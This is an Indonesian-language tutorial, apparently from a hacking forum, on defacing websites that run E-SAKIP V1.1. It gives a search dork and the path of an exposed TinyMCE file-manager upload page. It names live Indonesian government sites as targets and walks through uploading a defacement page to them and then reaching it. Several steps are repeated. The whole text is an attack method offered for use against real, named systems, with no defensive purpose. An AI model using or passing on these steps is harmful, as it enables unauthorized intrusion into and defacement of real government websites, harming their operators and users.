Assalamualaikum, balik lgi nih sama gw ArdhyanX kali ini gw mau share Tutorial Deface Poc E-SAKIP V1.1 File Manager... Oke lgsg aja kita gaskuen
Yang kita butuhkan :
~>Dork :
Dork: inurl:/portal/home/kontak_view
~> Exploit :
plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php
~>Live Target :
https://e-sakip.bontangkota.go.id https://esakip.jambikota.go.id http://sakip.bulelengkab.go.id
Oke... Yang pertama anda lakukan yaitu... Ngedork cari salah satu web yang sekiranya Vuln, masukin Exploit Nya, kalau mls Ngedork, pake aja live Target
Target yang saya gunakan
Selanjutnya kita kasih Exploit nya, contoh
https://e-sakip.bontangkota.go.id/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php
Click upload di bagian kiri atas
Kalian click "Drop files to upload" Click saja lalu pilih sc Deface kalian
Selanjutnya click "Return to files list" Jika udh, kita Cuba akses caranya seperti ini
Click upload di bagian kiri atas
Kalian click "Drop files to upload" Click saja lalu pilih sc Deface kalian
Selanjutnya click "Return to files list" Jika udh, kita Cuba akses caranya seperti ini
Contoh : .https://e-sakip.bontangkota.go.id/uploads/NamaScKamu.html
https://e-sakip.bontangkota.go.id/uploads/UH.html
Done !
